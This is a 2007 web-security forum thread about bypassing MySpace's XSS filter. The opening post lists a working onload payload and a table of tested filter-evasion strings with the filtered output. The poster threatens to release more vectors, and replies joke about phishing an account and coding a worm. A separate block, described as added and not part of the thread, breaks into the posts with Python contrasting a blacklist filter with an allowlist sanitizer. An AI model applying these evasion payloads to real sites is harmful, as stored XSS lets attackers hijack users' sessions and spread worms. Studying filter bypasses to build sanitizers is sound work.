Myspace (my turn)
Posted by: digi7al64
Date: January 06, 2007 08:08AM

Ok, with everyone going after Myspace at the moment I was feeling a little left out. Anyways I haven't really had any time until tonight to check out the site and see if it was still vulnerable to the non-alpha-non-digit XSS vector spoilts that have been published.

Sadly, whilst those specific spoilts were patched, it wasn't actually fixed. It seems they still don't grasp the issues involved and therefore are still vulnerable.

The code.
<body onload<scrip=alert('xss');>

The result
<body onload..=alert('xss');>

This should be nothing new to any of us, as, with the previous spoilt discovered by kuza55 I simply used their filters against them (and there are lots of them).

For some fun I decided to post the codes I was testing with (in order) so new users can see how perhaps we might go after something like this. (Originally I was going to go after an all-browser spoilt, and as you can see with the first couple of codes I was focusing on getting the script tags to fire. However I then realised I could easily use what I was testing with to re-create the Firefox 0 day. I then spent the next couple of efforts chasing my tail before I realised I already had it; my syntax was messy.)

Tested:                                         Result:
<scr<!--ipt-->alert('xss');>                    ..-->alert('xss');>
<scrip<scr<!--ipt-->alert('xss');>              <scrip..-->alert('xss');>
<script<scr<!--ipt-->alert('xss');>             <scrip..-->alert('xss');>
<scrip<scriptt-->lert('xss');>                  <scrip..t-->lert('xss');>
<scrip<tscr<!--ipt-->lert('xss');>              ..scr<!-- -->ipt-->lert('xss');>
<scrip<scrip<t>lert('xss');>                    <scrip..>lert('xss');>
<body onload<scrip<t>lert('xss');</script>      <body onload..>lert('xss');..>
<body onload<scrip<t>=alert('xss');</script>    <body onload..>=alert('xss');..>
<body onload<scrip<t=alert('xss');</script>     <body onload..=alert('xss');..>
<body onload<scrip<t=alert('xss');>             <body onload..=alert('xss');>
<body onload<script=alert('xss');>              <body onload..=alert('xss');>

Hopefully myspace can patch this properly this time... If not I will be posting more spoilts for the site soon.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

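A defender's view of the filter design problem digi7al64 shows above (and returns to further down the thread with the "reactive rather than proactive security" remark): the filter deletes a blacklisted substring and leaves filler behind, and the filler is exactly the kind of non-alphanumeric separator the non-alpha-non-digit vector tolerates. The code below is an added example, not from the forum post or from MySpace. The `strip_once` function is an assumed stand-in that reproduces only the one behaviour the post shows (the blacklisted token becomes `..`); the allowlist, the `http`/`https` restriction on URL attributes and the strict tag grammar are the example's own choices, not anything the page attributes to MySpace.

```python
import html
import re

# Payload and filtered result quoted from digi7al64's post in this thread.
THREAD_PAYLOAD = "<body onload<script=alert('xss');>"
THREAD_RESULT = "<body onload..=alert('xss');>"

# Assumption: the real filter's rules are not on the page. This stand-in only
# reproduces the single behaviour the post shows: one blacklisted token is
# replaced by the filler '..' in one pass, and the rest of the tag is kept.
BLACKLIST = re.compile(r"<script", re.IGNORECASE)


def strip_once(markup: str) -> str:
    """Single-pass blacklist filter: the weak pattern the thread discusses."""
    return BLACKLIST.sub("..", markup)


# Allowlist sanitizer (example design). A tag is kept only if the whole thing
# matches a strict grammar (letters-only tag and attribute names, double-quoted
# values) AND the tag and its attributes are on the allowlist. Everything else
# is escaped as text, so no filler or partial token is left for a browser to
# "repair" into an event handler.
CANDIDATE_TAG = re.compile(r"<[^<>]*>")          # no nested '<' inside a tag
STRICT_TAG = re.compile(
    r'^<(?P<close>/?)(?P<name>[a-z]+)(?P<attrs>(?:\s+[a-z]+(?:="[^"<>]*")?)*)\s*/?>$',
    re.IGNORECASE,
)
ATTR = re.compile(r'\s+([a-z]+)(?:="([^"<>]*)")?', re.IGNORECASE)

# Hypothetical allowlist for the example: tag name -> permitted attribute names.
ALLOWED = {"b": set(), "i": set(), "p": set(), "a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}


def _rebuild(tag):
    """Return a canonical tag string if it is fully allowed, else None."""
    name = tag.group("name").lower()
    if name not in ALLOWED:
        return None
    parts = []
    for attr_name, value in ATTR.findall(tag.group("attrs")):
        attr_name = attr_name.lower()
        if attr_name not in ALLOWED[name]:
            return None                      # e.g. onload, onerror
        if attr_name in URL_ATTRS and not value.lower().startswith(("http://", "https://")):
            return None                      # e.g. javascript: URLs
        parts.append(f' {attr_name}="{value}"')
    return f"<{tag.group('close')}{name}{''.join(parts)}>"


def allowlist_sanitize(markup: str) -> str:
    """Keep allowlisted, well-formed tags; escape everything else verbatim."""
    out, pos = [], 0
    for cand in CANDIDATE_TAG.finditer(markup):
        out.append(html.escape(markup[pos:cand.start()]))
        pos = cand.end()
        strict = STRICT_TAG.match(cand.group(0))
        rebuilt = _rebuild(strict) if strict else None
        out.append(rebuilt if rebuilt is not None else html.escape(cand.group(0)))
    out.append(html.escape(markup[pos:]))
    return "".join(out)


if __name__ == "__main__":
    print("blacklist residue :", strip_once(THREAD_PAYLOAD))
    print("allowlist output  :", allowlist_sanitize(THREAD_PAYLOAD))
    print("allowlist on residue:", allowlist_sanitize(THREAD_RESULT))
```

Two design points matter here. Rejected markup is escaped rather than deleted, so the output never contains a fragment the browser can reassemble, and the strict name grammar (`[a-z]+`) rejects `onload..` and `onload<script` alike without needing to know which separator characters a given browser ignores. The `strip_once` model passes the post's own payload straight through to the post's own result, which is the behaviour an allowlist parser is meant to rule out.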
Re: Myspace (my turn)
Posted by: eyeced
Date: January 06, 2007 08:29AM

Haha your turn! Well done, as RSnake mentioned before this could quite easily be solved by using a while loop to check the code before it is saved on the profile. I think myspace have pretty good XSS filters, whilst still managing to keep the functionality of the html tags they allow.

Nice work!

Re: Myspace (my turn)
Posted by: jungsonn
Date: January 06, 2007 08:57AM

Wow super!

Re: Myspace (my turn)
Posted by: bubbles
Date: January 06, 2007 03:48PM

Awesome find!

-bubbles
http://webmastertutorials.net

Re: Myspace (my turn)
Posted by: jungsonn
Date: January 07, 2007 10:29AM

Do we all get turns on MySpace? Alas, too lazy to even signup there ^^

Re: Myspace (my turn)
Posted by: bubbles
Date: January 09, 2007 09:50AM

Well considering how often XSS for myspace comes up, you could just phish yourself an account :)

-bubbles
http://webmastertutorials.net

Re: Myspace (my turn)
Posted by: jungsonn
Date: January 09, 2007 10:08AM

Yeah but, it's getting a little boring to me to hear about an XSS in MySpace. It's like an XSS in eBay or Yah!ho? dunno, old news. They just suck at being secure. Seems many do the work for the MySpace developers. My take on it is to let them figure their own things out, and not the easy way.

Re: Myspace (my turn)
Posted by: xKraigx
Date: January 09, 2007 04:11PM

jungsonn Wrote:
-------------------------------------------------------
> Do we all get turns on MySpace? Alas, too lazy to
> even signup there ^^


ahaha this is SO true!

Re: Myspace (my turn)
Posted by: digi7al64
Date: January 09, 2007 04:46PM

jungsonn Wrote:
-------------------------------------------------------
> Yeah but, it's getting a little boring to me to hear about an XSS in MySpace. It's like an XSS in eBay or Yah!ho? dunno, old news. They just suck at being secure. Seems many do the work for the MySpace developers. My take on it is to let them figure their own things out, and not the easy way.


digi7al64 Wrote:
-------------------------------------------------------
lol. Personally, as someone who dabbles in hacking/pen testing/code auditing etc., I like to see how sites handle the development of their security modules when issues arise. ATM we have a perfect example of reactive security rather than proactive security. This is why the non-alpha-non-digit XSS vector continues to work and will continue to work until they examine the issues of why it is happening.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/09/2007 04:50PM by digi7al64.

Re: Myspace (my turn)
Posted by: eyeced
Date: January 09, 2007 05:39PM

I'll be looking out for them patching it as I've just visited the ha.ckers.org homepage and the title is getting quite funny. Just one more find and we'll have MySpace 0-Day Again (Again (Again) (Again)), all from the same cause!

Re: Myspace (my turn)
Posted by: digi7al64
Date: January 09, 2007 06:06PM

Interestingly I have a few other vectors up my sleeve at this time.

However, rather than release them all in one go, I will wait and see what happens and how they approach this particular fix... will they fix it properly or will they only address this particular vector?

Also I am sort of hoping (since they are the cleverest people) that they will remove the .. altogether and thereby allow us to implement other attack methods (which is quite possible; they seemed determined to allow the onload tag to stay in place).

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Myspace (my turn)
Posted by: Spikeman
Date: January 10, 2007 03:01AM

Anyone wanna try coding a worm?

Re: Myspace (my turn)
Posted by: jungsonn
Date: January 10, 2007 04:23AM

About the while loops for the programmers like RSnake mentioned in his wit, isn't it a nice idea to write a while > foreach loop to poke with XSS dorks at their filters? Anyway, that's what I would do in such a case 'cause most of the above examples look like each other ^^

Re: Myspace (my turn)
Posted by: eyeced
Date: January 10, 2007 05:29AM

The fragmentation works again, with a little tweaking, but for now I can't see much point in using it as this method has the same outcome but with less effort.
